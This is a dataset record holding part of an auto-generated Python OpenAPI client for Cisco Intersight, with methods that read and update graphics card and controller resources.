blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e30846293cbee3d68c2188e6581dc18878084898
|
e56214188faae8ebfb36a463e34fc8324935b3c2
|
/intersight/api/graphics_api.py
|
12b65e3024d8b135e38e989cf34b0a0185bfea6c
|
[
"Apache-2.0"
] |
permissive
|
CiscoUcs/intersight-python
|
866d6c63e0cb8c33440771efd93541d679bb1ecc
|
a92fccb1c8df4332ba1f05a0e784efbb4f2efdc4
|
refs/heads/master
| 2021-11-07T12:54:41.888973 | 2021-10-25T16:15:50 | 2021-10-25T16:15:50 | 115,440,875 | 25 | 18 |
Apache-2.0
| 2020-03-02T16:19:49 | 2017-12-26T17:14:03 |
Python
|
UTF-8
|
Python
| false | false | 64,543 |
py
|
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from intersight.api_client import ApiClient
from intersight.exceptions import (ApiTypeError, ApiValueError)
class GraphicsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_graphics_card_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCard
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_card_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_graphics_card_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsCard, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_graphics_card_by_moid" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_graphics_card_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Cards/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsCard', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_graphics_card_list(self, **kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCardList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_card_list_with_http_info(**
kwargs) # noqa: E501
def get_graphics_card_list_with_http_info(self, **kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsCardList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_graphics_card_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Cards',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsCardList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_graphics_controller_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_controller_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsController
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_controller_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_graphics_controller_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_controller_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsController, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_graphics_controller_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_graphics_controller_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Controllers/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsController', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_graphics_controller_list(self, **kwargs): # noqa: E501
"""Read a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_controller_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsControllerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_controller_list_with_http_info(
**kwargs) # noqa: E501
    def get_graphics_controller_list_with_http_info(self,
                                                    **kwargs):  # noqa: E501
        """Read a 'graphics.Controller' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_graphics_controller_list_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
        :param str orderby: Determines what properties are used to sort the collection of resources.
        :param int top: Specifies the maximum number of resources to return in the response.
        :param int skip: Specifies the number of resources to skip in the response.
        :param str select: Specifies a subset of properties to return.
        :param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
        :param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
        :param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
        :param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
        :param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(GraphicsControllerList, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the call arguments; the contents of 'kwargs' are
        # validated against 'all_params' and merged in below.
        local_var_params = locals()

        all_params = [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
            'count', 'inlinecount', 'at'
        ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fail fast on any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method get_graphics_controller_list" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']

        collection_formats = {}

        path_params = {}

        # Map each supplied option onto its OData-style query parameter
        # (options left as None are simply omitted from the query string).
        query_params = []
        if 'filter' in local_var_params and local_var_params[
                'filter'] is not None:  # noqa: E501
            query_params.append(
                ('$filter', local_var_params['filter']))  # noqa: E501
        if 'orderby' in local_var_params and local_var_params[
                'orderby'] is not None:  # noqa: E501
            query_params.append(
                ('$orderby', local_var_params['orderby']))  # noqa: E501
        if 'top' in local_var_params and local_var_params[
                'top'] is not None:  # noqa: E501
            query_params.append(
                ('$top', local_var_params['top']))  # noqa: E501
        if 'skip' in local_var_params and local_var_params[
                'skip'] is not None:  # noqa: E501
            query_params.append(
                ('$skip', local_var_params['skip']))  # noqa: E501
        if 'select' in local_var_params and local_var_params[
                'select'] is not None:  # noqa: E501
            query_params.append(
                ('$select', local_var_params['select']))  # noqa: E501
        if 'expand' in local_var_params and local_var_params[
                'expand'] is not None:  # noqa: E501
            query_params.append(
                ('$expand', local_var_params['expand']))  # noqa: E501
        if 'apply' in local_var_params and local_var_params[
                'apply'] is not None:  # noqa: E501
            query_params.append(
                ('$apply', local_var_params['apply']))  # noqa: E501
        if 'count' in local_var_params and local_var_params[
                'count'] is not None:  # noqa: E501
            query_params.append(
                ('$count', local_var_params['count']))  # noqa: E501
        if 'inlinecount' in local_var_params and local_var_params[
                'inlinecount'] is not None:  # noqa: E501
            query_params.append(
                ('$inlinecount',
                 local_var_params['inlinecount']))  # noqa: E501
        if 'at' in local_var_params and local_var_params[
                'at'] is not None:  # noqa: E501
            query_params.append(('at', local_var_params['at']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        # GET request: no body is sent for a collection read.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Delegate the HTTP exchange (auth, serialization and the optional
        # async thread) to the shared ApiClient.
        return self.api_client.call_api(
            '/graphics/Controllers',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='GraphicsControllerList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def patch_graphics_card(self, moid, graphics_card, **kwargs): # noqa: E501
"""Update a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_graphics_card(moid, graphics_card, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCard
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_graphics_card_with_http_info(moid, graphics_card,
**kwargs) # noqa: E501
    def patch_graphics_card_with_http_info(self, moid, graphics_card,
                                           **kwargs):  # noqa: E501
        """Update a 'graphics.Card' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.patch_graphics_card_with_http_info(moid, graphics_card, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(GraphicsCard, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the call arguments; 'kwargs' is validated and merged below.
        local_var_params = locals()

        all_params = ['moid', 'graphics_card']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fail fast on any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method patch_graphics_card" % key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `patch_graphics_card`"
            )  # noqa: E501
        # verify the required parameter 'graphics_card' is set
        if self.api_client.client_side_validation and (
                'graphics_card' not in local_var_params or  # noqa: E501
                local_var_params['graphics_card'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `graphics_card` when calling `patch_graphics_card`"
            )  # noqa: E501

        collection_formats = {}

        # The Moid is interpolated into the '/graphics/Cards/{Moid}' path.
        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The resource payload is serialized as the PATCH request body.
        body_params = None
        if 'graphics_card' in local_var_params:
            body_params = local_var_params['graphics_card']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params[
            'Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json',
                 'application/json-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Delegate the HTTP exchange (auth, serialization and the optional
        # async thread) to the shared ApiClient.
        return self.api_client.call_api(
            '/graphics/Cards/{Moid}',
            'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='GraphicsCard',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def patch_graphics_controller(self, moid, graphics_controller,
**kwargs): # noqa: E501
"""Update a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_graphics_controller(moid, graphics_controller, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
